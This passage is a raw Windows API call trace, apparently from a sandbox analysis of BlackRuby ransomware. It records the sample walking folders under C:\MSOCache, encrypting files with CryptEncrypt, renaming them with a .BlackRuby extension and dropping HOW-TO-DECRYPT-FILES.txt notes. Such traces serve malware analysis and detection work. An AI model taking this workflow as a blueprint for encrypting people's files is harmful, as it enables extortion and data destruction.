returned 1 [0046.653] GetLastError () returned 0x0 [0046.653] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c42ed4*, pdwDataLen=0x18ed74*=0x6a0, dwBufLen=0x6a0 | out: pbData=0x1c42ed4*, pdwDataLen=0x18ed74*=0x6a0) returned 1 [0046.653] GetLastError () returned 0x0 [0046.653] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c43c40*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c43c40*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0046.653] GetLastError () returned 0x0 [0046.653] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c43c70*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c43c70*, pdwDataLen=0x18ed94*=0x10) returned 1 [0046.653] GetLastError () returned 0x0 [0046.653] CryptDestroyKey (hKey=0x360e60) returned 1 [0046.653] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.653] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0046.653] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.653] GetLastError () returned 0x0 [0046.653] SetErrorMode (uMode=0x1) returned 0x0 [0046.653] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.654] GetLastError () returned 0xb7 [0046.654] GetFileType (hFile=0x184) returned 0x1 [0046.654] SetErrorMode (uMode=0x0) returned 0x1 [0046.654] GetFileType (hFile=0x184) returned 0x1 [0046.656] CloseHandle (hObject=0x184) returned 1 [0046.656] GetLastError () returned 0xb7 [0046.656] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0046.656] GetLastError () returned 0xb7 [0046.656] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Encrypted_RWVygE3NuLYxVs1oYud70TM5twdP8HfMRkbkUW0p1LRAAxh.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Encrypted_RWVygE3NuLYxVs1oYud70TM5twdP8HfMRkbkUW0p1LRAAxh.BlackRuby", lpFilePart=0x0) returned 0x82 [0046.656] GetLastError () returned 0xb7 [0046.656] SetErrorMode (uMode=0x1) returned 0x0 [0046.656] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2e836200, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2e836200, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x2402e200, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x6b0)) returned 1 [0046.656] GetLastError () returned 0xb7 [0046.656] SetErrorMode (uMode=0x0) returned 0x1 [0046.656] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-0000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\Encrypted_RWVygE3NuLYxVs1oYud70TM5twdP8HfMRkbkUW0p1LRAAxh.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-0000-0000000ff1ce}-c\\encrypted_rwvyge3nulyxvs1oyud70tm5twdp8hfmrkbkuw0p1lraaxh.blackruby")) returned 1 [0046.656] GetLastError () returned 0xb7 [0046.657] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.657] GetLastError () returned 0xb7 [0046.657] SetErrorMode (uMode=0x1) returned 0x0 [0046.657] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0046.657] GetLastError () returned 0x5 [0046.658] SetErrorMode (uMode=0x0) returned 0x1 [0046.658] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0046.658] GetLastError () returned 0x5 [0046.658] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0046.658] GetLastError () returned 0x5 [0046.658] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0046.658] GetLastError () returned 0x5 [0046.658] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0046.658] GetLastError () returned 0x5 [0046.658] SetErrorMode (uMode=0x1) returned 0x0 [0046.658] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360e60 [0046.660] GetLastError () returned 0x5 [0046.660] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.660] GetLastError () returned 0x5 [0046.660] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.660] GetLastError () returned 0x5 [0046.660] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.660] GetLastError () returned 0x5 [0046.660] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.660] GetLastError () returned 0x5 [0046.660] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.660] GetLastError () returned 0x5 [0046.660] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.660] GetLastError () returned 0x5 [0046.660] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.660] GetLastError () returned 0x5 [0046.660] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.660] GetLastError () returned 0x5 [0046.660] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.660] GetLastError () returned 0x5 [0046.660] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.660] GetLastError () returned 0x5 [0046.660] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.660] GetLastError () returned 0x5 [0046.660] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.660] GetLastError () returned 0x5 [0046.660] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.660] GetLastError () returned 0x5 [0046.660] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.660] GetLastError () returned 0x5 [0046.660] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.660] GetLastError () returned 0x5 [0046.660] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.660] GetLastError () returned 0x5 [0046.661] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.661] GetLastError () returned 0x5 [0046.661] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.661] GetLastError () returned 0x5 [0046.661] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0046.661] GetLastError () returned 0x12 [0046.661] FindClose (in: hFindFile=0x360e60 | out: hFindFile=0x360e60) returned 1 [0046.661] SetErrorMode (uMode=0x0) returned 0x1 [0046.661] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C", lpFilePart=0x0) returned 0x3e [0046.661] GetLastError () returned 0x12 [0046.661] SetErrorMode (uMode=0x1) returned 0x0 [0046.662] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360e60 [0046.662] GetLastError () returned 0x12 [0046.662] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.662] GetLastError () returned 0x12 [0046.662] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.662] GetLastError () returned 0x12 [0046.662] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.663] GetLastError () returned 0x12 [0046.663] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.663] GetLastError () returned 0x12 [0046.663] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.663] GetLastError () returned 0x12 [0046.663] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.663] GetLastError () returned 0x12 [0046.663] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.663] GetLastError () returned 0x12 [0046.663] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.663] GetLastError () returned 0x12 [0046.663] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.663] GetLastError () returned 0x12 [0046.663] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.663] GetLastError () returned 0x12 [0046.663] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.663] GetLastError () returned 0x12 [0046.663] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.663] GetLastError () returned 0x12 [0046.663] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.663] GetLastError () returned 0x12 [0046.663] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.663] GetLastError () returned 0x12 [0046.663] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.663] GetLastError () returned 0x12 [0046.663] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.663] GetLastError () returned 0x12 [0046.663] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.663] GetLastError () returned 0x12 [0046.663] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0046.663] GetLastError () returned 0x12 [0046.663] FindNextFileW (in: hFindFile=0x360e60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0046.663] GetLastError () returned 0x12 [0046.663] FindClose (in: hFindFile=0x360e60 | out: hFindFile=0x360e60) returned 1 [0046.664] SetErrorMode (uMode=0x0) returned 0x1 [0046.664] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0046.664] GetLastError () returned 0x12 [0046.664] SetErrorMode (uMode=0x1) returned 0x0 [0046.664] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\branding.xml"), fInfoLevelId=0x0, lpFileInformation=0x1c66244 | out: lpFileInformation=0x1c66244*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0x30dc0990, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x91975)) returned 1 [0046.665] GetLastError () returned 0x12 [0046.665] SetErrorMode (uMode=0x0) returned 0x1 [0046.665] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0046.665] GetLastError () returned 0x12 [0046.665] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0046.666] GetLastError () returned 0x12 [0046.666] SetErrorMode (uMode=0x1) returned 0x0 [0046.666] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.666] GetLastError () returned 0x0 [0046.666] GetFileType (hFile=0x184) returned 0x1 [0046.666] SetErrorMode (uMode=0x0) returned 0x1 [0046.666] GetFileType (hFile=0x184) returned 0x1 [0046.666] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x91975 [0046.666] GetLastError () returned 0x0 [0046.667] ReadFile (in: hFile=0x184, lpBuffer=0x2c20b00, nNumberOfBytesToRead=0x91975, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x2c20b00*, lpNumberOfBytesRead=0x18ed84*=0x91975, lpOverlapped=0x0) returned 1 [0046.685] GetLastError () returned 0x0 [0046.685] CloseHandle (hObject=0x184) returned 1 [0046.685] GetLastError () returned 0x0 [0046.692] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0046.692] GetLastError () returned 0x0 [0046.692] SetErrorMode (uMode=0x1) returned 0x0 [0046.692] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\branding.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0x30dc0990, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x91975)) returned 1 [0046.692] GetLastError () returned 0x0 [0046.692] SetErrorMode (uMode=0x0) returned 0x1 [0046.692] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c708) returned 1 [0046.692] GetLastError () returned 0x0 [0046.730] CryptImportKey (in: hProv=0x37c708, pbData=0x1cc21a0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360b20) returned 1 [0046.730] GetLastError () returned 0x0 [0046.730] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.730] GetLastError () returned 0x0 [0046.735] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.735] GetLastError () returned 0x0 [0046.735] CryptDuplicateKey (in: hKey=0x360b20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360fa0) returned 1 [0046.735] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0046.735] GetLastError () returned 0x0 [0046.735] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x4, pbData=0x1cef1ec*=0x1, dwFlags=0x0) returned 1 [0046.735] GetLastError () returned 0x0 [0046.735] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x1, pbData=0x1cef1b8, dwFlags=0x0) returned 1 [0046.735] GetLastError () returned 0x0 [0046.741] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d43f30*, pdwDataLen=0x18ed74*=0x91a70, dwBufLen=0x91a70 | out: pbData=0x2d43f30*, pdwDataLen=0x18ed74*=0x91a70) returned 1 [0046.746] GetLastError () returned 0x0 [0046.751] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cef248*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1cef248*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0046.751] GetLastError () returned 0x0 [0046.751] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cef278*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1cef278*, pdwDataLen=0x18ed94*=0x10) returned 1 [0046.751] GetLastError () returned 0x0 [0046.785] CryptDestroyKey (hKey=0x360b20) returned 1 [0046.785] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0046.785] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0046.786] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0046.786] GetLastError () returned 0x0 [0046.786] SetErrorMode (uMode=0x1) returned 0x0 [0046.786] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.786] GetLastError () returned 0xb7 [0046.786] GetFileType (hFile=0x184) returned 0x1 [0046.786] SetErrorMode (uMode=0x0) returned 0x1 [0046.786] GetFileType (hFile=0x184) returned 0x1 [0046.795] CloseHandle (hObject=0x184) returned 1 [0046.795] GetLastError () returned 0xb7 [0046.795] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\branding.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\branding.xml", lpFilePart=0x0) returned 0x4b [0046.795] GetLastError () returned 0xb7 [0046.795] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Encrypted_dqjxr104l2xalHjr1adLMx20lF4X4A1IzOI7k9L.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Encrypted_dqjxr104l2xalHjr1adLMx20lF4X4A1IzOI7k9L.BlackRuby", lpFilePart=0x0) returned 0x7a [0046.795] GetLastError () returned 0xb7 [0046.795] SetErrorMode (uMode=0x1) returned 0x0 [0046.795] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\branding.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0x24184e60, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x91a80)) returned 1 [0046.795] GetLastError () returned 0xb7 [0046.795] SetErrorMode (uMode=0x0) returned 0x1 [0046.795] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\branding.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\Encrypted_dqjxr104l2xalHjr1adLMx20lF4X4A1IzOI7k9L.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\encrypted_dqjxr104l2xalhjr1adlmx20lf4x4a1izoi7k9l.blackruby")) returned 1 [0046.796] GetLastError () returned 0xb7 [0046.796] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.796] GetLastError () returned 0xb7 [0046.796] SetErrorMode (uMode=0x1) returned 0x0 [0046.797] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0046.798] GetLastError () returned 0x0 [0046.798] GetFileType (hFile=0x184) returned 0x1 [0046.798] SetErrorMode (uMode=0x0) returned 0x1 [0046.798] GetFileType (hFile=0x184) returned 0x1 [0046.798] WriteFile (in: hFile=0x184, lpBuffer=0x1b3e8a0*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1b3e8a0*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0046.799] GetLastError () returned 0x0 [0046.799] CloseHandle (hObject=0x184) returned 1 [0046.799] GetLastError () returned 0x0 [0046.799] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0046.799] GetLastError () returned 0x0 [0046.799] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0046.799] GetLastError () returned 0x0 [0046.799] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\DW20.EXE", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\DW20.EXE", lpFilePart=0x0) returned 0x47 [0046.799] GetLastError () returned 0x0 [0046.799] SetErrorMode (uMode=0x1) returned 0x0 [0046.799] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-0000-0000000ff1ce}-c\\dw20.exe"), fInfoLevelId=0x0, lpFileInformation=0x1b405ac | out: lpFileInformation=0x1b405ac*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa26c9d00, ftCreationTime.dwHighDateTime=0x1cac9ae, ftLastAccessTime.dwLowDateTime=0xa26c9d00, ftLastAccessTime.dwHighDateTime=0x1cac9ae, ftLastWriteTime.dwLowDateTime=0x30e0eb90, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0xccb88)) returned 1 [0046.799] GetLastError () returned 0x0 [0046.799] SetErrorMode (uMode=0x0) returned 0x1 [0046.800] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, 